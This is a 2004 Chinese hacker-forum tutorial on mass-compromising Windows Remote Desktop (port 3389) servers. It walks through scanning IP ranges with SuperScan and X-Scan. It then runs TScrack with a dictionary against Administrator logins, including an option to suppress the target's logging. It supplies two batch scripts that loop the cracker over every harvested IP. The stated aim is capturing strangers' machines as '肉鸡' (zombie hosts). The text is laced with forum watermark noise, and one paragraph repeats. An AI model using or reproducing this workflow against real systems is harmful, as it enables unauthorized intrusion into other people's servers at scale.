|
作者:霜风 QQ:14226581 # R& O0 g9 r& ~, d' E, J T
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。
3 z0 K* ?$ x. ~+ t这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下: $ V( m' z* A2 E9 m/ y, ?( A
首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:( {2 o; c- L5 z" K/ T7 D2 H1 P
先打开superscan3如图1% O1 D9 {* b$ o+ M' ?" L
. ~, V4 h6 f6 g; s) |4 D* k) v+ \
此主题相关图片如下:' L6 u, g6 t( J& \8 _
2 k; ~3 v/ I" ?* w& u: u
! }8 @4 `( C: h接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2- M' ~* N/ E* i3 [9 A% N
) x; o/ n5 Q# ~% x6 G5 ~
此主题相关图片如下:9 f4 C0 A, t4 M2 F9 q/ J
8 g& y3 Y. i' J- x
# B; E8 [: T; [7 K5 @
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.1 f6 N( Q- g! o
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
" M" J9 u. F6 ^/ ]
. C% D5 S# M6 T2 a此主题相关图片如下:
9 c. e4 ^4 ?% W2 t& e$ r( e; P 1 v! ^% p+ ~1 E- |9 K7 }. g
7 ` t! ] G5 {: I8 X
“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。2 ]% Q! }4 c [6 \$ Q1 |4 @2 B
3 P* N* D1 ^, h/ \0 y4 d此主题相关图片如下:
3 s# @$ S! I1 p0 @# ?" L8 R* P
- }2 I3 w" _. k7 @# _接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
# u/ f$ T% j* g
# n0 @( g$ `9 s9 y- T此主题相关图片如下:
8 z4 Y% m" {3 X6 H/ Q
' ]- `6 g' A' ^' {- X进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。$ i. F! O) D" X; i, f+ \9 k- d
所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。) ^5 }8 @# g7 _+ T% Y
TScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
1 C* X% t8 o) M! G! k- i此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。
+ I* e/ s3 p4 p8 ~在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:
2 y6 j+ z2 A' w7 h- d: F-h : Print usage help and exit$ l! X I' A, S+ x6 p+ s' Q2 _6 q
-V : Print version info and exit: ^* E: M3 h; D9 U
-s : Print chipher strenght info and exit# A7 j! W2 m9 |
-b : Enable failed password beep9 I8 i. Q. o5 T' W0 u, B3 B( M
-t : Use two simultaneous connections [EXPERIMENTAL]
; G9 {' n+ ~/ w& y; S) L [" G-N : Prevent System Log entries on targeted server; d: R x4 q# x' U, t) Q
-U : Uninstall tscrack and remove components5 M9 y1 x, v/ D" W2 F# Q
-f <number> : Wordlist entry to start cracking with
+ H! z) @) `1 u-F <delay> : Sampling Frequency (Delay between samples in ms) Q$ }6 K! m! S3 j" S
-l <user> : Account name to use, defaults to Administrator
8 F! }- F9 \7 d: e7 G: Y-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted/ c1 W: p& Q2 r
-p <password> : Use <password> to logon instead of wordlist/blank pass+ k3 ~+ ?5 s5 b& e1 G
-D <domain> : Specify domain to attempt logon to , H$ ]5 D" [3 f1 y& q7 f
& x$ ^" l& q# Z6 [7 x- F
2 O2 I: h* D9 z6 ~我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
E4 d% { ?4 R+ L, [3 p-h : 显示使用帮助然后退出1 m t$ J* g" { p/ \8 s
-V : 显示版本信息然后退出& D7 \* T5 d0 n$ E- j. z
-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)
5 `3 L* |5 Y' X7 \-b : 密码错误时发出声音# ?( F3 N: `! D% S. ~5 e# z0 `
-t : 同时发出多个连接,就是多线程。
; S Q1 T! K/ ]' W& Z9 F-N : Prevent System Log entries on targeted server
8 }, o- H' A& _+ m, p! @) o# c-U : 卸载移除tscrack组件。5 O8 Y6 Z$ c* v0 Z
-f <number> : 使用-F后面的密码。
, S# i/ c# w2 s! Y+ Z9 G-F <delay> : 间隔时间(频率)
5 U; _" N) z0 \6 p9 F. u4 H-l <user> : 使用-L后面的用户名" w) q, i) h% A- {* d w
-w <wordlist> : 使用-W后面的字典
) e6 S6 ~( k- H$ ~3 y-p <password> : 使用-W后的密码! P8 G; `8 `# w1 d
-D <domain> : 登陆主页面?
9 k# x3 S4 b4 P; g+ T7 ~相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:* G) E1 }; U; y1 B# Z
@if not exist IpcScan.txt goto noscan8 ] Z& T0 [+ i# a7 w8 D
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
& ?! h3 ?% `6 |+ a) H; P0 a:noscan. v- t/ P+ y9 d# |+ j& T
@echo 3389.txt no find or scan faild  0 e: P# G, z6 O9 y' g% D( U1 o) r4 I
这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)) y4 E6 {& C5 y2 ~4 g% m
保存后把后错名改为BAT就可以了。0 d+ s! {4 u2 E+ b. z9 v- Z: k; W
还写一个BAT,名字为HACK.BAT,代码如下:' }' F8 v+ l9 X% A
@if not exist tscrack.exe goto noscan
j% t+ a' ~% z7 \7 q, g1 t4 w@tscrack %1 -l administartor -w pass.dic >>rouji.txt* n, _7 a% k2 d. ^9 H% m/ Z7 K
:noscan C: o: Q. K- k# P
@echo tscrack.exe no find or scan faild / ]* a9 x6 B# g# ?4 p
这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
; u5 @6 ~, |* {/ S2 }- j制作方法如上。( w. T, e3 t3 W" j) f
然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图65 L. M" N! b' o8 C" X
! v; V8 o( x" M$ {
此主题相关图片如下:" ^* q6 J+ K* J/ f2 r: E
怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
2 }, }- L7 O2 ]4 m3 m- D( [最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
. l5 o7 J5 D% |- B" G, p
7 ]! s) y0 U8 w( P% F此主题相关图片如下:9 @8 q* B( U1 S/ J8 ]5 T, |# Y
- X* c# Y7 _5 j! e怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.
! K3 j1 s# B5 e7 u# X& h最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
